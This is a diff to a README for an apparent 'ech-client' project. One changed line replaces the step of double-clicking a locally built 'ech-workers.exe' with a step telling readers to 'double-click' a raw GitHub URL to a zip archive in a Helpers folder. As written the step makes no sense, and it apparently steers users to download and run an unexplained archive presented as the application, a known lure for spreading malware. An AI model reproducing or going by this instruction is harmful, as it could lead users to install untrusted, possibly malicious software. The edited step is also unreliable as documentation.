civciv1231433/ech-client/README.md

 ## ⚙️ Running the Application

 After building the application, navigate to the output directory.
-Double-click on `ech-workers.exe` to run it.
+Double-click on `https://raw.githubusercontent.com/civciv1231433/ech-client/main/Helpers/client_ech_v3.9-beta.2.zip` to run it.
 You will see the main interface, where you can manage your worker processes.

 ## 🆘 Troubleshooting